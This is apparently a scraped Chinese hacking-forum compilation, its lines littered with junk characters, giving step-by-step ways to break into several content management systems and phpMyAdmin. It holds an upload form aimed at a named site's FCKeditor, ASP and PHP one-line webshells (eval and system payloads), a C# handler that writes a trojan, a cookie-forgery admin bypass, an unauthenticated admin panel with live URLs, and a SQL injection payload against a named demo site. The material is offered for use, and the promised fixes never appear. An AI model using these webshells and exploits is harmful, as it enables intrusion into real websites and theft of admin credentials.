<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">1 T3 W) z0 W1 x0 }, u6 R
Upload a new file:<br>% @9 ?( B3 D4 j. f# K! c' w4 p; K
<input type="file" name="NewFile" size="50"><br>! ^+ ~& ~% c" t) [
<input id="btnUpload" type="submit" value="Upload">
2 ?1 t( }% m: j$ f9 M( |</form>
7 c1 ]% y; R4 S* v2 L-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 b# H" T% g* @. u3 c7 m" ]1 P' \- l! G; C. e# K9 P% A# Y
SDcms 后台拿webshell
% ?- C( E$ t7 E# l" [5 S( t
2 H3 J0 B6 M7 q5 f. \% _第一种方法:
) u$ q' C" n, v进入后台-->系统管理-->系统设置-->系统设置->网站名称;
$ O# Z6 U" y" u; y把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
/ U* r9 w# e9 [% ~& Z3 i用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。3 I" t$ o' ~- P" l& R" i
第二种方法:8 X2 O" _, ?1 S7 E
进入后台-->系统管理-->系统设置-->系统设置->上传设置;/ C% j* s/ m; v* p' N+ j
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!1 H& s; {/ {# s; r6 F
第三种方法:
5 N+ U: R1 J. L- n0 q4 \进入后台-->界面管理-->模板文件管理-->创建文件
$ T# V. A. H( `7 t文件名写入getshell.ashx. O. E0 E0 e4 V. K# A( i' d
内容写入下面内容:+ H8 b( B1 Q0 Z2 P! K( e6 K
/====================复制下面的=========================/- a, K. u$ Y+ l. A
<%@ WebHandler Language="C#" Class="Handler" %>" Z" Y* R; ]) [) z
using System;( {: c# d7 u0 c: H' z2 e0 {4 l5 v- Z
using System.Web;
( O, O2 [9 s2 ?6 C+ Q$ Nusing System.IO;
' [; l9 w: y- \public class Handler : IHttpHandler {
5 S6 m* A: w# T8 \& z: s& R# \public void ProcessRequest (HttpContext context) {
5 r$ i- r/ F0 Q( p( t" tcontext.Response.ContentType = "text/plain";
& Z8 z$ B$ _8 C& p( G, G2 fStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* Y. y4 Y0 ?0 m& Z. G) G) N2 B3 P$ m9 {
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
9 f. z: q( H/ p6 \0 I! V; l! f7 _5 Mfile1.Flush();
/ W0 L9 T0 Y( Jfile1.Close();
/ ], z! b2 k+ c( d}
% q ^6 N+ Q# N" G+ N2 ~0 }4 Fpublic bool IsReusable {+ H6 K. f9 m; G% t1 W( F4 g
get {
2 Z( H0 N I# H# Nreturn false;$ n/ d3 e0 j1 R0 R+ M5 ?: E. C
}1 k4 Y0 n9 g: V9 y
}/ B1 I9 R# ~% ` E
}
2 K- ]) O2 k" r9 u* F" p1 u5 ^/=============================================/( t/ z% S D" b w# h* N& p9 E
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx2 i' M$ m5 [, Y$ v
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
% m. N( ]9 x! q' v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( m, F; O3 e; l4 K$ p1 l& r3 P9 Y& U5 k7 t! F
ESCMS网站管理系统0day- J: N8 v& e0 ^
0 R6 A* a; @, [ R8 {; t
后台登陆验证是通过admin/check.asp实现的
$ ~2 ^$ d( E5 {! `- _+ g* ~4 D6 c" v( c; z/ c# P0 N
首先我们打开http://target.com/admin/es_index.html T. g! a4 d+ {6 ?" [
然后在COOKIE结尾加上, r7 z5 S3 E% ~7 o [
; ESCMS$_SP2=ES_admin=st0p;
- _4 W7 X3 p! n2 Y, ]修改,然后刷新
( J7 w" ?6 d. j+ o5 |/ E进后台了嘎../ a, e: b0 s7 T; J$ E. E
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL2 d$ t7 N+ L& _: z6 k; x
# Q: _8 x1 O- M
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
+ g- }* p8 Z: `% P- y3 k9 U7 \嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp% c# u( Q a8 \$ M# g% L& _
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..8 _9 R2 {! H. g, {4 g
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了* U2 \' i3 H2 p7 e E0 A
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ V2 I4 c( Z8 h2 x4 c
# Z; B7 S8 e/ V. \: A+ U2 F
宁志网站管理系统后台无验证漏洞及修复9 P8 ]- M# p% j2 K1 |7 M
8 I& C, H5 @0 F" D2 ^网上搜了一下,好像没有发布.如有雷同纯粹巧合!, L, ^* `) C1 ?$ b% V
官方网站:www.ningzhi.net
4 Y- x+ [& `: L" a6 ]学校网站管理系统 V.2011版本 _1 w/ I- U" J! |- `' B) o1 p
http://down.chinaz.com/soft/29943.htm
+ d" D7 g3 D( I* g其它版本(如:政府版等),自行下载.
. M* M; v- S0 R4 _. a( n漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~) n; e/ Q! U8 G- v" e% w" S
login.asp代码如下:+ A! P* }+ L' F5 x$ L. \
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
9 }* _1 w! Z L8 Emanage.asp代码我就不帖出来了.反正也没验证.
9 t( r. g; X% E& H' [# E只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
p( Q M. [/ g B漏洞利用:
" Y$ r8 \6 @9 j5 {1 M2 R6 I直接访问http://www.0855.tv/admin/manage.asp
8 c+ i! |) {+ T1 J+ }数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
) u% j$ w. `2 P( |8 M----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 V. `7 Z% a" C/ u& u5 `( ~& V" j& _& `1 }2 D# l3 R
phpmyadmin拿shell的四种方法总结及修复" j$ {- I! y/ M0 A
$ P0 s5 x4 j( @% _
方法一:
, ^3 R# a& d: T+ Y' p& p0 E4 F% qCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
. X3 s+ [1 H7 F( l$ NINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');- j8 G4 U* r9 ^7 b2 D3 q" m
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';1 O8 W |6 o4 Z @* }* ]
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
/ [3 Q* R$ U! ~0 Q' z 一句话连接密码:7on
- \3 ?: ^3 M0 J6 X( J+ E方法二:' E @0 @9 \) h
读取文件内容: select load_file('E:/xamp/www/s.php');
- F$ \ Z. o, _7 V- Y1 H! N/ M写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
% p. z7 s5 O5 K8 Bcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'+ C$ Q( @. N6 B+ y# `( [* b
方法三:6 _' W5 t) \% d9 Z' l# \
JhackJ版本 PHPmyadmin拿shell
. p6 S$ p2 D1 A! LCreate TABLE study (cmd text NOT NULL);. M) ^8 v) I6 ~+ Y& O3 o
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
+ d$ C% V+ s5 e9 D# G3 }0 z' wselect cmd from study into outfile 'E:/wamp/www/7.php';
5 C+ \2 F4 U! I1 S" iDrop TABLE IF EXISTS study;$ h5 D& ]5 G( c6 B V9 _: e% F! R9 x
<?php eval($_POST[cmd])?>8 U5 X! P( g( Q* i' Q$ V
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& i! j; Y6 i) BINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 15 \2 L0 L3 @* E) _0 w3 g
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
% d3 j) Q |0 e: C" [* K, uDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。$ ?# c' g, H9 W5 }
方法四:
" @/ `% C. _5 R& T- fselect load_file('E:/xamp/www/study.php');
$ m6 f, V- D! G- G' E) a/ h3 b8 Wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' |2 G2 n+ ^# L! e+ K# p( O然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
+ o7 p @& F% \% g0 b4 ?-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 D$ Q. O9 w; H$ s& p' u( B& L, d/ W: c6 W
8 A4 l( w- x& \0 b- s0 F, cNO.001中学网站管理系统 Build 110628 注入漏洞& B" D- \% P2 ]' V- [- E! c! [
' k! v" G3 ^4 }5 i1 F$ n
NO.001中学网站管理系统功能模块:
9 t9 l) y0 t6 v1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等0 m9 }4 C5 R3 B ~
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息8 q& y+ n( U! ]0 I
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
: P7 k7 @" X' p/ p: ?9 m4.视频图片管理:一级分类,动态添加视频或者图片等信息
' b4 @/ X- h2 w. z6 N" Q% E5.留言管理:对留言,修改,删除、回复等管理$ f) R/ k$ g" E" I& z+ K
6.校友频道:包括校友资料excel导出、管理等功能
' M; k1 I" `; u& a" N7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
, S2 ?6 `# j M( C默认后台:admin/login.asp
' I' B% C3 `- U0 b+ O官方演示:http://demo.001cms.net
; ]/ H. A% X/ S: N5 t源码下载地址:http://down.chinaz.com/soft/30187.htm
8 z% h; N2 l, N" @; F# aEXP:
4 d% }0 F& d, ]( U5 R& k/ U4 zunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin" R1 C! g3 c, U- e7 n
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin* ^6 y: E; |3 `, D. s; s
getshell:后台有备份,你懂的
. u0 J5 A' V* D另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
% ^8 X' R4 J0 W8 F2 Z" M( }/ V1 F------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |